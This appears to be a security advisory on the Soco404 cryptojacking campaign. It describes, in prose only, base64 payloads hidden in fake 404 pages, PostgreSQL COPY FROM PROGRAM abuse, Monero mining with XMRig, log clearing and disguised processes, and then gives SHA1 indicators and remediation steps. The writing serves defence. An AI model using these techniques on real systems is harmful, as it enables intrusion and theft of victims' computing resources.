Analysis Summary

The Soco404 cryptojacking campaign represents a sophisticated evolution of earlier miner botnets, cleverly using HTML-smuggled 404 error pages to hide malicious payloads. By embedding base64-encoded binaries between harmless-looking HTML tags on Google Sites and compromised Tomcat servers, the attackers bypass traditional web filters and static scanners. The technique allows them to infect both Linux and Windows systems, leveraging fake error pages hosted on domains like fastsoco. top to deliver malware that detonates in memory, making detection even more difficult. The campaign is believed to have emerged in mid-2025, building upon older attack vectors that targeted weak Tomcat credentials and unpatched Confluence systems.

Researchers uncovered this variant while monitoring suspicious shell activity from publicly exposed PostgreSQL databases, which many cloud tenants leave open. The attackers exploit PostgreSQL’s COPY FROM PROGRAM capability to execute arbitrary commands, enabling lateral movement and large-scale mining deployments across mixed operating environments. Beyond misconfigured databases, the attackers also hijack legitimate web infrastructure, including compromised Korean transport websites, to deliver OS-specific payloads: soco.sh for Linux and ok.exe for Windows. These loaders are built for stealth they immediately self-delete and mimic legitimate system processes such as sd-pam, kworker/R-rcu_p, or random Windows services to blend in and persist.

On Linux, the infection begins with a one-liner that fetches and runs the shell script, which clears logs (/var/log/wtmp), terminates competing miners, and enables CPU tweaks like hugepages and model-specific register (MSR) adjustments for performance optimization. A Go-based stub disguises itself as cpuhp/1 and starts mining Monero using the XMRig tool, connecting to pools like c3pool and moneroocean under a hardcoded wallet ID. On Windows, the loader employs tools like certutil, Invoke-WebRequest, or curl to drop ok.exe into C:\Users\Public\, injects it into conhost.exe, and removes traces by deleting the original file shortly after execution.

Persistence mechanisms are robust across both systems. The malware uses cron jobs, shell initialization hooks, and disables Windows Event Logs to maintain invisibility. It communicates through local sockets, employs watchdog threads to automatically restart if interrupted, and remains functional long after the infected 404 page is closed. From the defender’s perspective, the only early signs may be subtle: a slow dip in system performance and rising electricity usage, with the cryptojacking payload silently draining CPU resources to mine cryptocurrency in the background.

Impact

• Gain Access
• Security Bypass

Indicators of Compromise

SHA1

• 7e8914b3071183b4077c1eaacf78a0c8439eb36d
• ef3d4b6d107a284f564001a7cb363ddaa583edac
• c2137a39bb0ff956b3648f6109f88584affaabcf
• 1285909dcbb999d59cfc62e46770fe4232dc0a05
• 6e0ea3e14ff64ad616b59a9b28453fd202da64aa
• 7d9587d40ed530a76266074484a73742c85303ee

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Secure Tomcat, Atlassian Confluence, and PostgreSQL servers by enforcing strong passwords, disabling risky features like COPY FROM PROGRAM, and applying all available security updates.
• Avoid exposing databases and admin interfaces to the internet; restrict access using firewalls, VPNs, and proper network segmentation.
• Use advanced security tools that can deeply inspect HTML content for hidden base64 payloads, especially in error pages.
• Deploy endpoint detection and response (EDR/XDR) solutions that support memory-based threat detection and process injection monitoring.
• Monitor systems for unusual CPU usage spikes, suspicious outgoing connections to mining pools like c3pool or moneroocean, and access to domains like fastsoco.top.
• Regularly audit scheduled tasks, cron jobs, shell-init hooks, and unknown Windows services to remove any persistence mechanisms.
• Enable protections against log tampering and monitor for signs of log deletion or manipulation, such as missing entries in /var/log/wtmp or Windows Event Logs.
• Block known malicious domains and cryptocurrency wallet addresses using up-to-date threat intelligence feeds.
• Perform regular threat hunting for disguised processes (e.g., cpuhp/1, sd-pam, or random service names) and residual malware artifacts.
• Train IT and security teams to recognize modern smuggling techniques, including malware embedded within HTML error pages using base64 encoding.